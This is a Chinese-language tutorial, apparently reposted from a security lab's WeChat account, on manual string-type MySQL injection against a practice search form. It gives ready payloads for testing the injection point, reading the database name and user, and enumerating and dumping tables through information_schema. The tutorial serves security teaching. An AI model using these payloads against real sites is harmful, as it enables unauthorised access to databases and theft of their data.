01
字符型注入_确定注入点
正常搜索框搜索数据,输入名字就可以查询对应数据
查看PHP核心代码
解释:
1.红色箭头表示服务器通过GET请求把用户的kobe参数传到$name
2.黄色方框表示传入数据库的查询语句
加入恶意字符后,传入数据库的查询语句如下:
select id,email from member where username='kobe''
注入点测试,将payload1代入查询
kobe' and 1=1 #
select id,email from member where username='kobe' and 1=1 #'
kobe' and 1=2 #
02
字符型注入_获取基本信息
在这里基本确定注入点,查看当前数据库和用户
kobe' union select database(),user()#
传入数据库的查询命令如下
select id,email from member where username='kobe' union select database(),user()#'
👇常用查询语句👇
确定当前字段
kobe' order by 3#
查询指定库所有数据表
kobe' union select table_name,2,3 from information_schema.tables where (table_schema='数据库名')#
查询指定表的所有表头
kebo' union select column_name,2,3 from information_schema.columns where (table_name="表名")#
查看指定表头内容
kebo' union select 表头1,2,表头2 from 表名#
注释:注入方法与数字型注入基本相同,只要在闭合与注释符两者区间内执行mysql命令即可利用该漏洞,从这部分开始,后续不做详细介绍与演示。
本文始发于微信公众号(Khan安全攻防实验室):Mysql字符型手工注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论